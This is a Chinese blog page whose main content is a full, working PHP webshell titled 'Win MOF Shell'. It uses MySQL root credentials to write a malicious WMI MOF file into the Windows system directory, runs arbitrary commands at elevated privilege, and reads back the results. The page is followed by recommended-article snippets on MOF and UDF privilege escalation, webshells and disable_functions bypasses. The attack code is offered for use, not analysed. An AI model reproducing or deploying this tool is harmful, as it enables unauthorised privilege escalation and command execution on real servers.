提权php命令,mof提权带回显带清楚命令版本.php

最新推荐文章于 2021-06-18 06:22:52 发布
最新推荐文章于 2021-06-18 06:22:52 发布
阅读量142 收藏
点赞数
文章标签: 提权php命令

$path="c:/windows/system32/canimei";

session_start();

if(!empty($_POST['submit'])){

setcookie("connect");

setcookie("connect[host]",$_POST['host']);

setcookie("connect[user]",$_POST['user']);

setcookie("connect[pass]",$_POST['pass']);

setcookie("connect[dbname]",$_POST['dbname']);

echo "";

}

if(empty($_GET["action"])){

?>

Win MOF Shell

Host:

User:

Pass:

DB:

exit;

}

if ($_GET[action]=='connect')

{

$conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"])  or die('

'.mysql_error().'
');

echo "

";

echo "Cmd:";

echo "";

echo "
";

echo "
";

echo "";

echo "

";

echo "

";

echo "";

echo "";

echo "

";

if (isset($_POST['cmd'])){

$strCmd=$_POST['cmd'];

$cmdshell='cmd /c '.$strCmd.'>'.$path;

$mofname="c:/windows/system32/wbem/mof/system.mof";

$payload = "#pragma namespace(\"\\\\\\\\\\\\\\\\.\\\\\\\\root\\\\\\\\subscription\")

instance of __EventFilter as \$EventFilter

{

EventNamespace = \"Root\\\\\\\\Cimv2\";

Name  = \"filtP2\";

Query = \"Select * From __InstanceModificationEvent \"

\"Where TargetInstance Isa \\\\\"Win32_LocalTime\\\\\" \"

\"And TargetInstance.Second = 5\";

QueryLanguage = \"WQL\";

};

instance of ActiveScriptEventConsumer as \$Consumer

{

Name = \"consPCSV2\";

ScriptingEngine = \"JScript\";

ScriptText =

\"var WSH = new ActiveXObject(\\\\\"WScript.Shell\\\\\")\\\\nWSH.run(\\\\\"$cmdshell\\\\\")\";

};

instance of __FilterToConsumerBinding

{

Consumer = \$Consumer;

Filter = \$EventFilter;

};";

mysql_select_db($_COOKIE["connect"]["dbname"],$conn);

$sql1="select '$payload' into dumpfile '$mofname';";

if(mysql_query($sql1))

echo "

Execute Successful!
 Please click the read button to check the  result!!
If the result is not correct,try read again later
"; else die(mysql_error());

mysql_close($conn);

}

if(isset($_POST['flag']))

{

$conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"])  or die('

'.mysql_error().'
');

$sql2="select load_file(\"".$path."\");";

$result2=mysql_query($sql2);

$num=mysql_num_rows($result2);

while ($row = mysql_fetch_array($result2, MYSQL_NUM)) {

echo "

";

echo '

'. $row[0].'
';

}

mysql_close($conn);

}

}

?>

weixin_39901412
关注
113.网络安全渗透测试—[权限提升篇11]—[Windows 2003 Mysql MOF提权]
qwsn
07-06 2146
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! mof是windows系统的一个文件,存储在,叫做"托管对象格式",其作用是每隔五秒就会去监控进程创建和死亡。然而提权的原理就是在拥有了mysql的root权限以后(其实就是获得了MySQL的启动身份),然后使用该权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs脚本段大多数写的是cmd的添加管理员用户的命令。(1)操作系统版本:Windows Server
mysql mof提权_MySQL提权mof提权
weixin_42498989的博客
01-19 739
mof提权原理关于 mof 提权的原理其实很简单,就是利用了 c:/windows/system32/wbem/mof/ 目录下的 nullevt.mof 文件,每分钟都会在一个特定的时间去执行一次的特性,来写入我们的cmd命令使其被入执行。下面简单演示下 mof 提权的过程!MOF提权的条件要求十分严苛:1.windows 03及以下版本2.mysql启动身份具有权限去读写c:/windows...
php提权脚本
05-03
php提权脚本
php执行权限提权,PHP提权之异步执行
weixin_39602976的博客
03-18 405
在服务器上都会定时运行一些脚本以完成周期性的任务.而这些脚本往往是以root权限启动的,替换或者改变其中的内容就可以完成提权.而今天在这要讲解的就是php提权中的异步执行方法.在php中一般大家都用下面四个函数来调用系统命令,或者外部程序:echo exec("dir");echo shell_exec("dir");echo system("dir");echo passthru("dir"...
php后台提权,phpwind命令执行getshell(后台)
weixin_36482670的博客
03-10 679
### 简要描述:官网下载最新版### 详细说明:v9.0.1搭建好,登陆[](https://images.seebug.org/upload/201602/12102252ce0e0a04f54d200949718aa2bd67d7cc.png)在门户里选择页面管理,新增模块。自定义html[](https://images.seebug.org/upload/201602/12102352b...
php服务器提权,服务器提权
weixin_27945229的博客
03-13 509
当拿到WebShell 之后,下⼀步⼲什么?权限提升通过一些最初的漏洞利⽤途径,攻击者将获得⼀定的访问权限。接着,攻击者将逐步探查其破坏的系统来获得⽐最初更多的权限,以期望从其他账户访问敏感信息,甚⾄获得对整个系统的完全管理控制。当攻击者以这种⽅式扩⼤其最初的未经授权访问的权限时,将其⾏为称为权限提升攻击。简单来说,就是获取⽐最初更多的权限,甚⾄系统权限。⽔平权限提升(越权)我们假设攻击者已经获得...
PHP大马-php_mof SHELL.rar
11-17
nc反弹还需要再测试 PHP大马-php_mof SHELL.rar
mof提权文件nullevt.mof
03-12
mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/...隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs大多数的是cmd的添加管理员用户的命令mof文件通过Mofcomp.exe编译执行。
Mysql UDF、MOF、反链端口提权.zip
12-14
Mysql UDF、MOF、反链端口提权
渗透测试之提权 (udf提权+mof提权+启动项提权
LKmnbZ's Blog
11-07 5745
1. 提权 低权限给高权限去提取(你已经获得一定的权限) Windows 一般用户 系统用户 管理员 system Linux 普通用户 系统用户 root 2. udf提权 1、其利用条件是目标系统是Windows(Win2000,XP,Win2003);拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete 权限以创建和抛弃函...
DFT的matlab源代码-mof_screen:使用ASE/VASP的MOF的高通量DFT
05-26
DFT的matlab源代码PyMOF屏幕 使用VASP对MOF进行高通量DFT筛选的Python工作流程。 该代码的相关详细信息可以在以下论文中找到: AS Rosen,JM Notestein,RQ Snurr。 “通过高通量周期性密度泛函理论确定多相催化的有前景的金属有机骨架”,J。Comput。 化学(2019)。 DOI: 什么是PyMOFScreen? 涉及MOF的高通量DFT是一项棘手的业务。 它们大的晶胞,多样的结构和广泛变化的成分,使得在很少有人为干预的情况下实现既强大又高效的工作流程充满了挑战。 PyMOFScreen通过多阶段结构优化,动态选择的强大优化算法选择,自动错误处理等解决了这个问题。 在Snurr小组中,我们已使用PyMOFScreen以完全自动化的方式使用定期DFT来筛选成千上万的MOF。 要使吸附剂的构建过程自动化,请参阅我们的(MAI)代码。 准备运行的示例 最小的例子 首先,目录中提供了示例脚本。 以下是对存储在目录mofpath中的一组CIF执行音量松弛的最小示例。 from pymofscreen . cif_handler import ge
mof提权回显清楚命令版本.php
weixin_33881140的博客
11-04 85
<?php $path="c:/windows/system32/canimei"; session_start(); if(!empty($_POST['submit'])){ setcookie("connect"); setcookie("connect[host]",$_POST['host']); setcookie("connect[user]",$_POS...
php函数禁用提权,[原创]WEB安全第八章实战篇02 绕过Bypass disable_functions 提权
weixin_36343353的博客
03-26 362
WEB安全第八章实战篇02 绕过Bypass disable_functions 提权1.环境宝塔linux主机主机系统类型 centos php版本 5.42.禁用函数禁用这些执行命令的函数,导致无法执行命令。3.绕过方法劫持函数 劫持共享对象 执行命令cc -shared -fPIC bypass_disablefunc.c -o bypass_disablefunc_x64.so -ldl...
分析 PHP大马-php_mof SHELL
weixin_30840253的博客
06-23 715
Part 1 前言   https://www.phpinfo.cc/?post=30,这个马子,看上去满不错,我想要源码。 <?php $password = 'phpinfo';//登录密码 //----------功能程序------------------// $c = "chr"; session_start(); if (empty($_SESSION['Php...
php system ret 1,php运算符opcode 1
weixin_33958871的博客
04-10 124
php版本 PHP 5.3.141. ==(调用is_equal_function->compare_function ),!=(调用is_not_equal_function->compare_function)$i = 1;$j = 1.0;echo $i == $j;//opcodeline # * op fetch ...
html大马源码,php大马源码:【百家号】脸书百科,分析 PHP大马-php_mof SHELL Web程序...
weixin_34163588的博客
06-18 907
$password=‘phpinfo‘;//登录密码//----------功能程序------------------//$c="chr";session_start();if (empty($_SESSION[‘PhpCode‘])) {$url=$c(104).$c(116).$c(116).$c(112).$c(58);$url .=$c(47).$c(47).$c(119).$c(119...
Mof提权科普
weixin_30915951的博客
01-23 150
今天再拿一个站的时候遇到了很多问题,拿站的过程就不说了,其中要用到mof提权,不管能不能提下,我进行一个mof提权的科普 这里我综合各类mof提权进行了综合 首先说一下,无shell情况下的mysql远程mof提权利用方法详解 就是你注入拿到了数据库的root账号密码,直接进行 扫到一个站的注入 在havij中得到mysql数据库中mysql库保存的数据库密码: 有...
mysql mof提权原理_mof提权原理及其过程
最新发布
05-16
Mof提权的原理是通过创建一个恶意的Mof文件,并将其注册到WMI中,然后利用WMI的执行权限来执行Mof文件中的命令,从而实现提权。具体过程如下: 1. 创建一个恶意的Mof文件,并将其中的类名定义为“__EventFilter”,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值